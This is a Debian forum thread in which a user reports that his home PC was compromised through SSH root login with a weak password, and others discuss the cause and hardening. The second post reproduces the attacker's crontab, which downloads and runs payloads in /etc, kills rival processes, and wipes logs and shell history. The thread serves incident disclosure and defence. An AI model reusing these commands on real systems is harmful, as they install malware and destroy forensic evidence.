My home PC has been 0wn3d :(

Here you can discuss every aspect of Debian. Note: not for support requests!
Post Reply
Message
Author
grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

My home PC has been 0wn3d :(

#1 Post by grihad »

Story line: on Jan 9th I installed Debian 7.3 from scratch after my hard disk w/ Kubuntu had crashed. On Jan 10th, the following root personal crontab was somehow installed:

(I had to split my post into several parts because otherwise this forum gave me internal server errors)
Unfortunately I couldn't post original crontab (with tons of repeated comments) because of 500 internal error, but it went something like:
s file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
Last edited by grihad on 2014-01-24 07:00, edited 2 times in total.

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#2 Post by grihad »

If we strip the comments here's what we're left with:
s file to introduce tasks to be run by cron.
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 cupsdd
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
*/120 * * * * cd /etc; wget http://www.example.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.example.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.example.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.example.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.example.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.example.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.example.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/1 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
Last edited by grihad on 2014-01-25 06:47, edited 1 time in total.

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#3 Post by grihad »

I believe thanks to the "s" the crontab syntax was incorrect so nothing got to run.


I accidentally stumbled across this crontab only yesterday.

How could this happen? How do you believe they obtained root filesystem access? I do use sudo without password under my normal account, but sudo always asks for your password as per tty_tickets, and refuses to run if tty isn't present, as would be the case in a script or something, with the following message:
sudo: no tty present and no askpass program specified
So how could they do that? Debian did run sshd on start without asking me, so I ditched that, probably on Jan 12-13.

pcalvert
Posts: 1931
Joined: 2006-04-21 11:19
Location: Sol Sector

Re: My home PC has been 0wn3d :(

#4 Post by pcalvert »

grihad wrote:Debian did run sshd on start without asking me, so I ditched that, probably on Jan 12-13.
Well, how did that happen? That is NOT normal. How did you install Debian?

Phil
“It is better to believe than to disbelieve; in doing so, it brings
everything into the realm of possibility.” — Albert Einstein

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#5 Post by vbrummond »

It can be a headache for some admins how Debian starts services by default. Personally I think it is, especially when I want to configure something before I launch it. For example on my system here I never touched ssh and this is what I get:

Code: Select all

root@debian-konoe:~# /etc/init.d/ssh status
[ ok ] sshd is running.
I suppose the best thing to do is keep it off the networking during your first real boot until you disable all the services you don't need to start automatically.
Always on Debian Testing

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#6 Post by vbrummond »

Also you might want to edit those links in your post. If they are some form of malware, they could be accidentally downloaded and also they are being indexed by search engines.
Always on Debian Testing

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#7 Post by grihad »

vbrummond, ditto, unfortunately that's what Debian does... IIRC I chose graphical install from the official Debian ISO ("burned" onto a flash stick using YUMI).

Meanwhile I disabled root's personal crontab modification to prevent the dumbest types of automated attacks, just in case.

# chattr +i /var/spool/cron/crontabs/root

Now I know how those stupid f#$%s broke root, sshd_config has PermitRootLogin yes by default...

Way to go, Debian, not only do you run sshd on boot without warning your users, you also PermitRootLogin...

Now I see that I stopped sshd from running on boot only 2 days after the fresh install:
-rw-r--r-- 1 root root 0 Jan 11 22:14 /etc/ssh/sshd_not_to_be_run
So the freaks used that 2 day window of opportunity to break the rather weak root password I had (which was simply "root").
I wasn't expecting that people would be allowed to use the password through any means. Way to go, Debian...


vbrummond, good point, I just removed the domain name.

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#8 Post by vbrummond »

You might report a bug suggesting disabling the root account (in ssh) by default. I disable it myself. It defeats an attack vector if they can't just hammer passwords on root. You might look into fail2ban as well.
Always on Debian Testing

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#9 Post by grihad »

fail2ban would be great on a server, thanks. But I prefer not running any susceptible network visible servers in the first place rather than run them all and use some root daemon to update the firewall. I did install a simple firewall but again later than they broke root...
In /etc/network/interfaces:
...
pre-up /root/firewall.sh

And /root/firewall.sh based on one I found on the Internet which is pretty solid as it only allows incoming packets from previosly initiated connections.
# Flush previous rules, delete chains and reset counters
iptables -F
iptables -X
iptables -Z
iptables -t nat -F

# Default policies
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

# Enable loopback traffic
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

# Enable statefull rules (after that, only need to allow NEW conections)
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

# Drop invalid state packets
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
iptables -A OUTPUT -m conntrack --ctstate INVALID -j DROP
iptables -A FORWARD -m conntrack --ctstate INVALID -j DROP


## INPUT

# Incoming ssh from the LAN
#iptables -A INPUT -i "$INSIDE_IFACE" -s "$LOCALNET" \
# -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT

# Enable access traffic, from LAN to us
iptables -A INPUT -i "$INSIDE_IFACE" -s "$LOCALNET" -j ACCEPT

# transmission-qt
iptables -A INPUT -p tcp --dport 51413 -j ACCEPT

## OUTPUT

# Enable al outgoing traffic to internet
iptables -A OUTPUT -o "$OUTSIDE_IFACE" -d 0.0.0.0/0 -j ACCEPT

# Enable access traffic, from the firewall to the LAN network
iptables -A OUTPUT -o "$INSIDE_IFACE" -d "$LOCALNET" -j ACCEPT
iptables -A OUTPUT -o "$MODEM_IFACE" -d "$MODEM_IP" -j ACCEPT


## FORWARD

# We have dinamic IP (DHCP), so we've to masquerade
iptables -t nat -A POSTROUTING -o "$OUTSIDE_IFACE" -j MASQUERADE
iptables -A FORWARD -o "$OUTSIDE_IFACE" -i "$INSIDE_IFACE" -s "$LOCALNET" -m conntrack --ctstate NEW -j ACCEPT

# transparent web-proxy
iptables -t nat -A PREROUTING -i "$INSIDE_IFACE" -p tcp --dport 80 -j REDIRECT --to-port 3128

pcalvert
Posts: 1931
Joined: 2006-04-21 11:19
Location: Sol Sector

Re: My home PC has been 0wn3d :(

#10 Post by pcalvert »

grihad and vbrummond, please post the output of these commands:

Code: Select all

$ aptitude search openssh
$ aptitude why openssh-server
Phil
“It is better to believe than to disbelieve; in doing so, it brings
everything into the realm of possibility.” — Albert Einstein

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#11 Post by Birdy »

vbrummond wrote:It can be a headache for some admins how Debian starts services by default. Personally I think it is, especially when I want to configure something before I launch it. For example on my system here I never touched ssh and this is what I get:

Code: Select all

root@debian-konoe:~# /etc/init.d/ssh status
[ ok ] sshd is running.
I suppose the best thing to do is keep it off the networking during your first real boot until you disable all the services you don't need to start automatically.
Debian doesn't install ssh-server unless you tick it during tasksel.
If you install a service and first want to configure it, stop it immediatly after you installed it, configure it, start it.


sysadmin, huh?

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#12 Post by grihad »

pcalvert,
$ aptitude search openssh
p libconfig-model-openssh-perl - configuration file editor for OpenSsh
p libnet-openssh-compat-perl - collection of compatibility modules for Net::OpenSSH
p libnet-openssh-perl - Perl SSH client package implemented on top of OpenSSH
i A openssh-blacklist - list of default blacklisted OpenSSH RSA and DSA keys
i A openssh-blacklist-extra - list of non-default blacklisted OpenSSH RSA and DSA keys
i openssh-client - secure shell (SSH) client, for secure access to remote machines
i A openssh-server - secure shell (SSH) server, for secure access from remote machines
$ aptitude why openssh-server
i task-ssh-server Depends openssh-server
$
I don't use an openssh server on my home pc and don't need or want it installed, but I do use openssh client extensively.

Birdy, in any case PermitRootLogin would best be set to "no" by default, as in FreeBSD.
The OpenSSH server didn't bite me this time, PermitRootLogin did.

Interestingly, FreeBSD's sshd manpage designates the default as "no", while Debian's is "yes".

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#13 Post by Birdy »

If you don't need openssh-server, then don't install it.
If you need a client: it is installed per default already.
If you need the server but don't want root-access, disable it in the config file.
If you don't know how to do that, you shouldn't run a ssh-server.
If you don't forward the ssh-server's port at your routers webinterface, the internet can do crap with your running ssh-server
(in other words: all you post is crap. If you forwarded your port without configuring properly, then that is really your problem)
This is really no witchcraft.

Last but not least: No one hinders you to use BSD. It is a rock solid operating system.

grihad
Posts: 71
Joined: 2014-01-10 17:45
Location: Baku, Azerbaijan

Re: My home PC has been 0wn3d :(

#14 Post by grihad »

Birdy, stop being mean :D
My home pc IS the router, I initiate the PPPoE connection from it.
Didn't know Debian had the ssh client installed implicitely, thanks.

p.s. I do use FreeBSD's on servers as it seems to be "the best of the breed" (no offence, Debian), but at home I got used to Debian & Kubuntu. The installer got mucked during all these years since I don't remember OpenSSH being enabled by default from my previous installs.

User avatar
llivv
Posts: 5484
Joined: 2007-02-14 18:10
Location: cold storage

Re: My home PC has been 0wn3d :(

#15 Post by llivv »

0wn3d :(
grihad wrote:(no offence, Debian), but at home I got used to Debian & Kubuntu. The installer got mucked during all these years since I don't remember OpenSSH being enabled by default from my previous installs.
Humm !
what next?
In memory of Ian Ashley Murdock (1973 - 2015) founder of the Debian project.

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#16 Post by Birdy »

grihad wrote:Birdy, stop being mean :D
My home pc IS the router, I initiate the PPPoE connection from it.
Didn't know Debian had the ssh client installed implicitely, thanks.

p.s. I do use FreeBSD's on servers as it seems to be "the best of the breed" (no offence, Debian), but at home I got used to Debian & Kubuntu. The installer got mucked during all these years since I don't remember OpenSSH being enabled by default from my previous installs.
No router. I see.

Let me check if i got everything right:
You live in Baku.
You have got Debian installed at home and are running BSD-servers
You also got Kubuntu running (or sometimes Debian and sometimes Kubuntu?) at home.
But you haven't got a decent router?

Besides that you experienced the very unusual thing of getting cracked, for the only reason that sshd was running and root-login was allowed.
While for other people ssh-server doesn't get installed per default, for you it did get (ok, the superadmin has the same experience, but no one else)..

And, last but not least, though being used to the BSD-installer you decided to install from a liveCD? Ort did you use the graphical installer from CD1?

I got everything right?
If yes: Does all of that sound very likely? (Speaking of the sum of all that, not each single thing).
It doesn't. If it is true anyway: I can send you a cheap router for free, assuming you can't affort one yourself (Belking with wireless or Netgear without wireless, an old FritzBox, what you want). Send me a pm and we can get it sorted.

I am not mean or unfriendly. I only point out the obvious (sit back and think a bit: if you heard such stories from someone else, what would _you think?).

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#17 Post by vbrummond »

Birdy wrote:Debian doesn't install ssh-server unless you tick it during tasksel.
It could be installed for a number of reasons. In my case it was installed and enabled by default.
If you install a service and first want to configure it, stop it immediatly after you installed it, configure it, start it.
sysadmin, huh?
Sysadmin, huh? Kid, grow up.
Always on Debian Testing

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#18 Post by Birdy »

vbrummond wrote:
Birdy wrote:Debian doesn't install ssh-server unless you tick it during tasksel.
It could be installed for a number of reasons. In my case it was installed and enabled by default.
.
No. Plain and simple.

vbrummond
Posts: 4468
Joined: 2010-03-02 01:42

Re: My home PC has been 0wn3d :(

#19 Post by vbrummond »

It must be fun being wrong. I installed using a prebuilt image of the system, which had ssh included and enabled.
Always on Debian Testing

Birdy
Posts: 358
Joined: 2013-05-28 13:26

Re: My home PC has been 0wn3d :(

#20 Post by Birdy »

vbrummond wrote:It must be fun being wrong. I installed using a prebuilt image of the system, which had ssh included and enabled.
That is really your problem, not of Debian.

Post Reply